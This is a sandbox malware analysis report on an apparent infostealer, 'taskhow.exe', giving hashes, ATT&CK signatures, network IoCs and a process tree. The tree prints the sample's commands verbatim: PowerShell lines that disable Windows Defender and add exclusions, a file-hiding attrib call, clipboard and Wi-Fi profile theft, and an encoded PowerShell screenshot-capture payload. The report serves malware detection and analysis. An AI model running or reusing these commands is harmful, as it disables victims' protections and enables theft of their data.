2177e9e3e681ab7fea739c4427e79f357abe8baae27f033138ab1d931c001ce3

Analysis

max time kernel
45s
max time network
47s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
04/02/2025, 16:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

taskhow.exe
Size

14.7MB
MD5

6db8d333be4b11d76666b98a8f559e8e
SHA1

805226cde1ac220255144c706135b2f184b4d6e4
SHA256

5c62a60afc48ac948aec92c680737a765dfe15e1e251b799f6a299ff29f10bb3
SHA512

8f87f830146e221b1ca8ccb64dec06c65b8bcbf3c35bd62ebb02036c742be6f4384f4621a2dc734da20ede3196f2c219d483605c247eb1069c0eac82b5cc29d0
SSDEEP

393216:8XLa8bxKwj37YjXfj9lj0IHL7HmBYXrkaxzoaUNV:g3T8zfj9r6BYgaxzoaQV

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
884	powershell.exe
4692	powershell.exe
2152	powershell.exe
1892	powershell.exe
1944	powershell.exe
2296	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2144	cmd.exe
3140	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1876	bound.exe
2124	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe
3112	taskhow.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
37	discord.com
38	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
34	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
832	tasklist.exe
4184	tasklist.exe
3364	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1884	cmd.exe

UPX packed file 40 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x0007000000023cc9-67.dat	upx
behavioral4/memory/3112-71-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp	upx
behavioral4/files/0x0007000000023c91-73.dat	upx
behavioral4/files/0x0007000000023cc7-75.dat	upx
behavioral4/files/0x0007000000023c92-131.dat	upx
behavioral4/files/0x0007000000023c90-130.dat	upx
behavioral4/files/0x0007000000023ccf-129.dat	upx
behavioral4/files/0x0007000000023ccd-128.dat	upx
behavioral4/files/0x0007000000023ccc-127.dat	upx
behavioral4/memory/3112-78-0x00007FFEAE390000-0x00007FFEAE39F000-memory.dmp	upx
behavioral4/memory/3112-77-0x00007FFEAE3A0000-0x00007FFEAE3C7000-memory.dmp	upx
behavioral4/files/0x0007000000023cc8-124.dat	upx
behavioral4/files/0x0007000000023cc6-123.dat	upx
behavioral4/memory/3112-136-0x00007FFEAE3D0000-0x00007FFEAE3FB000-memory.dmp	upx
behavioral4/memory/3112-137-0x00007FFEAE300000-0x00007FFEAE319000-memory.dmp	upx
behavioral4/memory/3112-138-0x00007FFEAE250000-0x00007FFEAE275000-memory.dmp	upx
behavioral4/memory/3112-139-0x00007FFE9AFE0000-0x00007FFE9B15F000-memory.dmp	upx
behavioral4/memory/3112-140-0x00007FFEAB850000-0x00007FFEAB869000-memory.dmp	upx
behavioral4/memory/3112-141-0x00007FFEAB840000-0x00007FFEAB84D000-memory.dmp	upx
behavioral4/memory/3112-143-0x00007FFEAB380000-0x00007FFEAB3B3000-memory.dmp	upx
behavioral4/memory/3112-142-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp	upx
behavioral4/memory/3112-144-0x00007FFE9A330000-0x00007FFE9A863000-memory.dmp	upx
behavioral4/memory/3112-146-0x00007FFEAAC60000-0x00007FFEAAD2E000-memory.dmp	upx
behavioral4/memory/3112-148-0x00007FFEAB360000-0x00007FFEAB374000-memory.dmp	upx
behavioral4/memory/3112-147-0x00007FFEAE3A0000-0x00007FFEAE3C7000-memory.dmp	upx
behavioral4/memory/3112-149-0x00007FFEAB480000-0x00007FFEAB48D000-memory.dmp	upx
behavioral4/memory/3112-154-0x00007FFEAE3D0000-0x00007FFEAE3FB000-memory.dmp	upx
behavioral4/memory/3112-155-0x00007FFEAA270000-0x00007FFEAA323000-memory.dmp	upx
behavioral4/memory/3112-250-0x00007FFEAE300000-0x00007FFEAE319000-memory.dmp	upx
behavioral4/memory/3112-295-0x00007FFEAE250000-0x00007FFEAE275000-memory.dmp	upx
behavioral4/memory/3112-298-0x00007FFE9AFE0000-0x00007FFE9B15F000-memory.dmp	upx
behavioral4/memory/3112-301-0x00007FFEAB850000-0x00007FFEAB869000-memory.dmp	upx
behavioral4/memory/3112-308-0x00007FFEAB840000-0x00007FFEAB84D000-memory.dmp	upx
behavioral4/memory/3112-312-0x00007FFE9A330000-0x00007FFE9A863000-memory.dmp	upx
behavioral4/memory/3112-311-0x00007FFEAB380000-0x00007FFEAB3B3000-memory.dmp	upx
behavioral4/memory/3112-323-0x00007FFEAAC60000-0x00007FFEAAD2E000-memory.dmp	upx
behavioral4/memory/3112-324-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp	upx
behavioral4/memory/3112-409-0x00007FFE9AFE0000-0x00007FFE9B15F000-memory.dmp	upx
behavioral4/memory/3112-403-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp	upx
behavioral4/memory/3112-438-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4592	netsh.exe
2340	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4636	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1720	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
884	powershell.exe
884	powershell.exe
1944	powershell.exe
1944	powershell.exe
1876	bound.exe
1876	bound.exe
4692	powershell.exe
4692	powershell.exe
884	powershell.exe
884	powershell.exe
2152	powershell.exe
2152	powershell.exe
2152	powershell.exe
1944	powershell.exe
1944	powershell.exe
3140	powershell.exe
3140	powershell.exe
948	powershell.exe
948	powershell.exe
4692	powershell.exe
3140	powershell.exe
948	powershell.exe
1876	bound.exe
1876	bound.exe
2296	powershell.exe
2296	powershell.exe
1144	powershell.exe
1144	powershell.exe
1892	powershell.exe
1892	powershell.exe
1892	powershell.exe
1160	powershell.exe
1160	powershell.exe
1160	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1876	bound.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	884	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	832	tasklist.exe
Token: SeDebugPrivilege	4184	tasklist.exe
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeIncreaseQuotaPrivilege	1960	WMIC.exe
Token: SeSecurityPrivilege	1960	WMIC.exe
Token: SeTakeOwnershipPrivilege	1960	WMIC.exe
Token: SeLoadDriverPrivilege	1960	WMIC.exe
Token: SeSystemProfilePrivilege	1960	WMIC.exe
Token: SeSystemtimePrivilege	1960	WMIC.exe
Token: SeProfSingleProcessPrivilege	1960	WMIC.exe
Token: SeIncBasePriorityPrivilege	1960	WMIC.exe
Token: SeCreatePagefilePrivilege	1960	WMIC.exe
Token: SeBackupPrivilege	1960	WMIC.exe
Token: SeRestorePrivilege	1960	WMIC.exe
Token: SeShutdownPrivilege	1960	WMIC.exe
Token: SeDebugPrivilege	1960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1960	WMIC.exe
Token: SeRemoteShutdownPrivilege	1960	WMIC.exe
Token: SeUndockPrivilege	1960	WMIC.exe
Token: SeManageVolumePrivilege	1960	WMIC.exe
Token: 33	1960	WMIC.exe
Token: 34	1960	WMIC.exe
Token: 35	1960	WMIC.exe
Token: 36	1960	WMIC.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	3364	tasklist.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeIncreaseQuotaPrivilege	1960	WMIC.exe
Token: SeSecurityPrivilege	1960	WMIC.exe
Token: SeTakeOwnershipPrivilege	1960	WMIC.exe
Token: SeLoadDriverPrivilege	1960	WMIC.exe
Token: SeSystemProfilePrivilege	1960	WMIC.exe
Token: SeSystemtimePrivilege	1960	WMIC.exe
Token: SeProfSingleProcessPrivilege	1960	WMIC.exe
Token: SeIncBasePriorityPrivilege	1960	WMIC.exe
Token: SeCreatePagefilePrivilege	1960	WMIC.exe
Token: SeBackupPrivilege	1960	WMIC.exe
Token: SeRestorePrivilege	1960	WMIC.exe
Token: SeShutdownPrivilege	1960	WMIC.exe
Token: SeDebugPrivilege	1960	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1960	WMIC.exe
Token: SeRemoteShutdownPrivilege	1960	WMIC.exe
Token: SeUndockPrivilege	1960	WMIC.exe
Token: SeManageVolumePrivilege	1960	WMIC.exe
Token: 33	1960	WMIC.exe
Token: 34	1960	WMIC.exe
Token: 35	1960	WMIC.exe
Token: 36	1960	WMIC.exe
Token: SeDebugPrivilege	1876	bound.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeIncreaseQuotaPrivilege	1136	WMIC.exe
Token: SeSecurityPrivilege	1136	WMIC.exe
Token: SeTakeOwnershipPrivilege	1136	WMIC.exe
Token: SeLoadDriverPrivilege	1136	WMIC.exe
Token: SeSystemProfilePrivilege	1136	WMIC.exe
Token: SeSystemtimePrivilege	1136	WMIC.exe
Token: SeProfSingleProcessPrivilege	1136	WMIC.exe
Token: SeIncBasePriorityPrivilege	1136	WMIC.exe
Token: SeCreatePagefilePrivilege	1136	WMIC.exe
Token: SeBackupPrivilege	1136	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1876	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1904 wrote to memory of 3112	1904	taskhow.exe	86
PID 1904 wrote to memory of 3112	1904	taskhow.exe	86
PID 3112 wrote to memory of 4072	3112	taskhow.exe	89
PID 3112 wrote to memory of 4072	3112	taskhow.exe	89
PID 3112 wrote to memory of 4088	3112	taskhow.exe	90
PID 3112 wrote to memory of 4088	3112	taskhow.exe	90
PID 3112 wrote to memory of 4332	3112	taskhow.exe	93
PID 3112 wrote to memory of 4332	3112	taskhow.exe	93
PID 3112 wrote to memory of 1896	3112	taskhow.exe	94
PID 3112 wrote to memory of 1896	3112	taskhow.exe	94
PID 3112 wrote to memory of 1884	3112	taskhow.exe	95
PID 3112 wrote to memory of 1884	3112	taskhow.exe	95
PID 4072 wrote to memory of 884	4072	cmd.exe	99
PID 4072 wrote to memory of 884	4072	cmd.exe	99
PID 3112 wrote to memory of 1728	3112	taskhow.exe	100
PID 3112 wrote to memory of 1728	3112	taskhow.exe	100
PID 4088 wrote to memory of 1944	4088	cmd.exe	102
PID 4088 wrote to memory of 1944	4088	cmd.exe	102
PID 1896 wrote to memory of 1876	1896	cmd.exe	103
PID 1896 wrote to memory of 1876	1896	cmd.exe	103
PID 3112 wrote to memory of 1676	3112	taskhow.exe	104
PID 3112 wrote to memory of 1676	3112	taskhow.exe	104
PID 3112 wrote to memory of 4988	3112	taskhow.exe	105
PID 3112 wrote to memory of 4988	3112	taskhow.exe	105
PID 3112 wrote to memory of 3012	3112	taskhow.exe	108
PID 3112 wrote to memory of 3012	3112	taskhow.exe	108
PID 3112 wrote to memory of 2144	3112	taskhow.exe	109
PID 3112 wrote to memory of 2144	3112	taskhow.exe	109
PID 4332 wrote to memory of 4692	4332	cmd.exe	110
PID 4332 wrote to memory of 4692	4332	cmd.exe	110
PID 3112 wrote to memory of 5032	3112	taskhow.exe	115
PID 3112 wrote to memory of 5032	3112	taskhow.exe	115
PID 3112 wrote to memory of 4436	3112	taskhow.exe	112
PID 3112 wrote to memory of 4436	3112	taskhow.exe	112
PID 1884 wrote to memory of 2256	1884	cmd.exe	111
PID 1884 wrote to memory of 2256	1884	cmd.exe	111
PID 3112 wrote to memory of 4560	3112	taskhow.exe	117
PID 3112 wrote to memory of 2340	3112	taskhow.exe	116
PID 3112 wrote to memory of 4560	3112	taskhow.exe	117
PID 3112 wrote to memory of 2340	3112	taskhow.exe	116
PID 3112 wrote to memory of 1848	3112	taskhow.exe	122
PID 3112 wrote to memory of 1848	3112	taskhow.exe	122
PID 1676 wrote to memory of 832	1676	cmd.exe	123
PID 1676 wrote to memory of 832	1676	cmd.exe	123
PID 4988 wrote to memory of 4184	4988	cmd.exe	125
PID 4988 wrote to memory of 4184	4988	cmd.exe	125
PID 1728 wrote to memory of 2152	1728	cmd.exe	126
PID 1728 wrote to memory of 2152	1728	cmd.exe	126
PID 2144 wrote to memory of 3140	2144	cmd.exe	153
PID 2144 wrote to memory of 3140	2144	cmd.exe	153
PID 3012 wrote to memory of 1960	3012	cmd.exe	128
PID 3012 wrote to memory of 1960	3012	cmd.exe	128
PID 5032 wrote to memory of 4340	5032	cmd.exe	129
PID 5032 wrote to memory of 4340	5032	cmd.exe	129
PID 4560 wrote to memory of 1720	4560	cmd.exe	130
PID 4560 wrote to memory of 1720	4560	cmd.exe	130
PID 1848 wrote to memory of 948	1848	cmd.exe	157
PID 1848 wrote to memory of 948	1848	cmd.exe	157
PID 2340 wrote to memory of 4592	2340	cmd.exe	133
PID 2340 wrote to memory of 4592	2340	cmd.exe	133
PID 4436 wrote to memory of 3364	4436	cmd.exe	134
PID 4436 wrote to memory of 3364	4436	cmd.exe	134
PID 3112 wrote to memory of 3612	3112	taskhow.exe	135
PID 3112 wrote to memory of 3612	3112	taskhow.exe	135

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2256	attrib.exe

C:\Users\Admin\AppData\Local\Temp\taskhow.exe
"C:\Users\Admin\AppData\Local\Temp\taskhow.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1904
- C:\Users\Admin\AppData\Local\Temp\taskhow.exe
  "C:\Users\Admin\AppData\Local\Temp\taskhow.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\taskhow.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\taskhow.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\taskhow.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\taskhow.exe"
      4⤵
      Views/modifies file attributes
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1676
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4988
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3012
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5032
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4560
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
